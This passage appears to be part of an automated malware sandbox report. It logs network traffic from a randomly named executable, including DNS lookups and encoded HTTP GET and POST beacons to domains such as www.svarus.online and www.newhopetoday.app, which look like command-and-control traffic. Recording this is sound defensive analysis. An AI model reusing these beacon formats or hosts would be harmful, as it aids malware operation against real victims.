                                                                                                                                            Oct 22, 2024 13:29:06.464679003 CEST4999980192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:06.470534086 CEST80499993.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:06.471461058 CEST4999980192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:06.483345985 CEST4999980192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:06.488886118 CEST80499993.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:07.993658066 CEST4999980192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:07.999445915 CEST80499993.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:07.999505997 CEST4999980192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:09.011698961 CEST5000080192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:09.019555092 CEST80500003.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:09.019773006 CEST5000080192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:09.029290915 CEST5000080192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:09.038357973 CEST80500003.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:09.039205074 CEST80500003.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:09.669636965 CEST80500003.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:09.669744015 CEST5000080192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:10.543368101 CEST5000080192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:10.637358904 CEST80500003.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:11.558331013 CEST5000180192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:11.564100027 CEST80500013.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:11.564327955 CEST5000180192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:11.569258928 CEST5000180192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:11.574832916 CEST80500013.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:12.188291073 CEST80500013.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:12.188399076 CEST80500013.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:12.188746929 CEST5000180192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:12.192298889 CEST5000180192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:12.197918892 CEST80500013.33.130.190192.168.2.5

                                                                                                                                            UDP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Oct 22, 2024 13:26:45.783858061 CEST5677053192.168.2.51.1.1.1
                                                                                                                                            Oct 22, 2024 13:26:45.881920099 CEST53567701.1.1.1192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:38.909348011 CEST6373453192.168.2.51.1.1.1
                                                                                                                                            Oct 22, 2024 13:27:39.004682064 CEST53637341.1.1.1192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:55.106684923 CEST5586753192.168.2.51.1.1.1
                                                                                                                                            Oct 22, 2024 13:27:55.477144003 CEST53558671.1.1.1192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:08.878012896 CEST6396453192.168.2.51.1.1.1
                                                                                                                                            Oct 22, 2024 13:28:08.903202057 CEST53639641.1.1.1192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:22.636953115 CEST5537653192.168.2.51.1.1.1
                                                                                                                                            Oct 22, 2024 13:28:22.706584930 CEST53553761.1.1.1192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:36.348496914 CEST6483253192.168.2.51.1.1.1
                                                                                                                                            Oct 22, 2024 13:28:36.412081003 CEST53648321.1.1.1192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:49.893327951 CEST6372653192.168.2.51.1.1.1
                                                                                                                                            Oct 22, 2024 13:28:49.934215069 CEST53637261.1.1.1192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:03.748092890 CEST6415753192.168.2.51.1.1.1
                                                                                                                                            Oct 22, 2024 13:29:03.909686089 CEST53641571.1.1.1192.168.2.5

                                                                                                                                            DNS Queries

                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Oct 22, 2024 13:26:45.783858061 CEST192.168.2.51.1.1.10x3f70Standard query (0)kambud.bizA (IP address)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:27:38.909348011 CEST192.168.2.51.1.1.10x7d43Standard query (0)www.svarus.onlineA (IP address)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:27:55.106684923 CEST192.168.2.51.1.1.10xc9caStandard query (0)www.newhopetoday.appA (IP address)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:28:08.878012896 CEST192.168.2.51.1.1.10x520eStandard query (0)www.ladylawher.orgA (IP address)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:28:22.636953115 CEST192.168.2.51.1.1.10x51d0Standard query (0)www.nutrigenfit.onlineA (IP address)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:28:36.348496914 CEST192.168.2.51.1.1.10xba6Standard query (0)www.gold-rates.onlineA (IP address)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:28:49.893327951 CEST192.168.2.51.1.1.10xedc0Standard query (0)www.3808.appA (IP address)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:29:03.748092890 CEST192.168.2.51.1.1.10x6f8aStandard query (0)www.yourwebbuzz.netA (IP address)IN (0x0001)false

                                                                                                                                            DNS Answers

                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Oct 22, 2024 13:26:45.881920099 CEST1.1.1.1192.168.2.50x3f70No error (0)kambud.biz185.17.43.223A (IP address)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:27:39.004682064 CEST1.1.1.1192.168.2.50x7d43No error (0)www.svarus.online194.58.112.174A (IP address)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:27:55.477144003 CEST1.1.1.1192.168.2.50xc9caNo error (0)www.newhopetoday.app216.40.34.41A (IP address)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:28:08.903202057 CEST1.1.1.1192.168.2.50x520eNo error (0)www.ladylawher.orgladylawher.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:28:08.903202057 CEST1.1.1.1192.168.2.50x520eNo error (0)ladylawher.org3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:28:08.903202057 CEST1.1.1.1192.168.2.50x520eNo error (0)ladylawher.org15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:28:22.706584930 CEST1.1.1.1192.168.2.50x51d0No error (0)www.nutrigenfit.onlinenutrigenfit.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:28:22.706584930 CEST1.1.1.1192.168.2.50x51d0No error (0)nutrigenfit.online195.110.124.133A (IP address)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:28:36.412081003 CEST1.1.1.1192.168.2.50xba6No error (0)www.gold-rates.online199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:28:49.934215069 CEST1.1.1.1192.168.2.50xedc0No error (0)www.3808.app13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:28:49.934215069 CEST1.1.1.1192.168.2.50xedc0No error (0)www.3808.app76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:29:03.909686089 CEST1.1.1.1192.168.2.50x6f8aNo error (0)www.yourwebbuzz.netyourwebbuzz.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:29:03.909686089 CEST1.1.1.1192.168.2.50x6f8aNo error (0)yourwebbuzz.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                            Oct 22, 2024 13:29:03.909686089 CEST1.1.1.1192.168.2.50x6f8aNo error (0)yourwebbuzz.net15.197.148.33A (IP address)IN (0x0001)false

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • kambud.biz
                                                                                                                                            • www.svarus.online
                                                                                                                                            • www.newhopetoday.app
                                                                                                                                            • www.ladylawher.org
                                                                                                                                            • www.nutrigenfit.online
                                                                                                                                            • www.gold-rates.online
                                                                                                                                            • www.3808.app
                                                                                                                                            • www.yourwebbuzz.net

                                                                                                                                            HTTP Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.549977194.58.112.17480764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:27:39.024836063 CEST431OUTGET /sa87/?vd=fhUlwfGxBn-tt&-v4puN=UqcT3NX6Xc6Oa5c5HtJN6Sm3jRGrdUDSppl2CYCGZerglEzU6CQj7u00+cYUshbCTVWQ/5Gc6Lshk9bP6yg8NGP70JKOBpAfy7n0mtS8Kr3O7U4faJdfEPNjknslXQEWEA== HTTP/1.1
                                                                                                                                            Host: www.svarus.online
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Oct 22, 2024 13:27:39.917622089 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Tue, 22 Oct 2024 11:27:39 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 32 34 65 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 76 61 72 75 73 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 [TRUNCATED]
                                                                                                                                            Data Ascii: 24e1<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.svarus.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.ru" [TRUNCATED]
                                                                                                                                            Oct 22, 2024 13:27:39.917649031 CEST1236INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f
                                                                                                                                            Data Ascii: div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.svarus.online</h1><p class="b-parking__header-d
                                                                                                                                            Oct 22, 2024 13:27:39.917661905 CEST1236INData Raw: bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f
                                                                                                                                            Data Ascii: .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_hosting"><
                                                                                                                                            Oct 22, 2024 13:27:39.917671919 CEST636INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 70 72 69 6d 61 72 79 20 62 2d
                                                                                                                                            Data Ascii: div class="b-parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://www.reg.ru/hosting/?utm_
                                                                                                                                            Oct 22, 2024 13:27:39.917684078 CEST1236INData Raw: 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 62 2d 74 69 74 6c 65 20 62 2d 74 69 74 6c 65 5f 73 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 22 3e d0 92 d0 b8 d1 80 d1 82 d1 83 d0 b0 d0 bb d1 8c d0 bd d1 8b
                                                                                                                                            Data Ascii: e_hosting"><strong class="b-title b-title_size_large-compact"> , VPS &nbsp;Dedicated</strong><p class="b-text b-parking__promo-description"> &n
                                                                                                                                            Oct 22, 2024 13:27:39.917694092 CEST212INData Raw: 74 65 6d 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 73 73 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 6d 61 67 65 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d
                                                                                                                                            Data Ascii: tem b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image_type_ssl l-margin_right-large"></span> <strong class="b-title b-title_size_large-compact b-title_margin_none">SSL-
                                                                                                                                            Oct 22, 2024 13:27:39.917711973 CEST1236INData Raw: d0 b8 d1 84 d0 b8 d0 ba d0 b0 d1 82 20 d0 b1 d0 b5 d1 81 d0 bf d0 bb d0 b0 d1 82 d0 bd d0 be 20 d0 bd d0 b0 26 6e 62 73 70 3b 36 20 d0 bc d0 b5 d1 81 d1 8f d1 86 d0 b5 d0 b2 20 3c 2f 73 74 72 6f 6e 67 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75
                                                                                                                                            Data Ascii: &nbsp;6 </strong><a class="b-button b-button_color_reference b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_ssl" href="https://help.reg.ru/supp
                                                                                                                                            Oct 22, 2024 13:27:39.917723894 CEST1236INData Raw: 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 64 61 74 61 2e 72 65 66 5f 69 64 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6c 69 6e 6b
                                                                                                                                            Data Ascii: return; } if ( data.ref_id ) { var links = document.querySelectorAll( 'a' ); for ( var i = 0; i < links.length; i++) { if ( links[ i ].href.indexOf('?') >= 0 ) {
                                                                                                                                            Oct 22, 2024 13:27:39.917732954 CEST1236INData Raw: 20 76 61 72 20 64 6f 6d 61 69 6e 4e 61 6d 65 55 6e 69 63 6f 64 65 20 3d 20 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28 20 64 6f 6d 61 69 6e 4e 61 6d 65 20 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 74
                                                                                                                                            Data Ascii: var domainNameUnicode = punycode.ToUnicode( domainName ); document.title = document.title.replace( domainName, domainNameUnicode ); } for ( var i = 0; i < spans.length; i++) { if ( spans[ i ].classNam
                                                                                                                                            Oct 22, 2024 13:27:39.917745113 CEST104INData Raw: 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 6c 65 66 74 3a 2d 39 39 39 39 70 78 3b 22 20 61 6c 74 3d 22 22 3e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 21 2d 2d 20 2f 59 61 6e 64 65 78 2e 4d 65 74 72 69 6b 61 20 63 6f 75 6e 74 65 72 20 2d 2d
                                                                                                                                            Data Ascii: n:absolute; left:-9999px;" alt=""></div></noscript>... /Yandex.Metrika counter --></body></html>0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.549978216.40.34.4180764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:27:55.497391939 CEST697OUTPOST /y868/ HTTP/1.1
                                                                                                                                            Host: www.newhopetoday.app
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 207
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.newhopetoday.app
                                                                                                                                            Referer: http://www.newhopetoday.app/y868/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Raw: 2d 76 34 70 75 4e 3d 79 75 50 75 31 37 5a 49 48 6b 72 55 71 6d 61 67 4e 66 54 41 64 45 73 67 6d 4e 4d 34 4d 69 6b 6f 4a 62 6f 64 77 37 55 4f 4f 59 4a 33 69 78 33 78 41 61 7a 59 79 50 75 75 62 59 47 61 4c 73 35 61 73 33 43 2b 2b 6e 78 56 31 72 6e 65 71 4b 57 62 38 41 6e 57 67 6b 76 76 78 43 6d 5a 36 65 66 6b 68 58 52 6c 77 45 35 78 52 56 4d 47 43 58 59 41 32 55 49 39 31 39 4f 73 56 59 65 73 6c 4c 36 6b 6d 46 44 47 34 67 61 6d 63 2f 69 74 4a 57 61 66 68 32 6c 61 66 65 44 66 2b 67 2b 6c 75 65 32 2b 35 78 64 6e 32 47 47 79 36 42 54 65 70 71 76 4c 48 67 65 78 50 4d 41 57 4c 53 67 6e 6d 77 4d 76 42 30 36 53 4a 7a 45 3d
                                                                                                                                            Data Ascii: -v4puN=yuPu17ZIHkrUqmagNfTAdEsgmNM4MikoJbodw7UOOYJ3ix3xAazYyPuubYGaLs5as3C++nxV1rneqKWb8AnWgkvvxCmZ6efkhXRlwE5xRVMGCXYA2UI919OsVYeslL6kmFDG4gamc/itJWafh2lafeDf+g+lue2+5xdn2GGy6BTepqvLHgexPMAWLSgnmwMvB06SJzE=
                                                                                                                                            Oct 22, 2024 13:27:56.199512005 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                            x-request-id: 4a31b0fc-240d-4165-8e51-d421e7e48755
                                                                                                                                            x-runtime: 0.035018
                                                                                                                                            content-length: 17022
                                                                                                                                            connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                                                                                                            Oct 22, 2024 13:27:56.199558020 CEST212INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                                                                                                            Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; }
                                                                                                                                            Oct 22, 2024 13:27:56.199614048 CEST1236INData Raw: 20 20 20 2e 73 6f 75 72 63 65 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 39 44 39 44 39 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 45 43 45 43 45 43 3b 0a 20 20 20 20 20 20 77 69 64
                                                                                                                                            Data Ascii: .source { border: 1px solid #D9D9D9; background: #ECECEC; width: 978px; } .source pre { padding: 10px 0px; border: none; } .source .data { font-size: 80%; overflow: auto; bac
                                                                                                                                            Oct 22, 2024 13:27:56.199650049 CEST1236INData Raw: 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 74 65 78 74 66 69 65 6c 64 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 62 6f 64 79 20 74 72 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f
                                                                                                                                            Data Ascii: it-appearance: textfield; } #route_table tbody tr { border-bottom: 1px solid #ddd; } #route_table tbody tr:nth-child(odd) { background: #f2f2f2; } #route_table tbody.exact_matches, #route_table tbody.fuzzy_matches {
                                                                                                                                            Oct 22, 2024 13:27:56.199686050 CEST1236INData Raw: 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 3c 68 32 3e 4e 6f 20 72 6f 75 74 65 20 6d 61 74 63 68 65 73 20 5b 50 4f 53 54 5d 20 26 71 75 6f 74 3b 2f 79 38 36
                                                                                                                                            Data Ascii: Error</h1></header><div id="container"> <h2>No route matches [POST] &quot;/y868&quot;</h2> <p><code>Rails.root: /hover-parked</code></p><div id="traces"> <a href="#" onclick="hide(&#39;Framework-Trace&#39;);hide(&#39;Full-Trace&#
                                                                                                                                            Oct 22, 2024 13:27:56.199718952 CEST636INData Raw: 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 33 22 20 68 72 65 66 3d 22 23 22 3e 72 61 69 6c 74 69 65 73 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 72 61 69 6c 73 2f 72 61 63 6b 2f 6c 6f 67 67 65 72 2e 72 62 3a 32
                                                                                                                                            Data Ascii: ace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:28:in `call&#39;</a><br><a class="trace-frames" data-frame-id="4" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/remote_ip.rb:81:in `call&#39;</a><br>
                                                                                                                                            Oct 22, 2024 13:27:56.199754000 CEST1236INData Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60
                                                                                                                                            Data Ascii: "trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call
                                                                                                                                            Oct 22, 2024 13:27:56.199788094 CEST1236INData Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 74 68 72 65 61 64 5f 70 6f 6f 6c 2e 72 62 3a 31 33
                                                                                                                                            Data Ascii: "trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames" data-f
                                                                                                                                            Oct 22, 2024 13:27:56.199821949 CEST1236INData Raw: 64 5f 6f 76 65 72 72 69 64 65 2e 72 62 3a 32 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72
                                                                                                                                            Data Ascii: d_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache
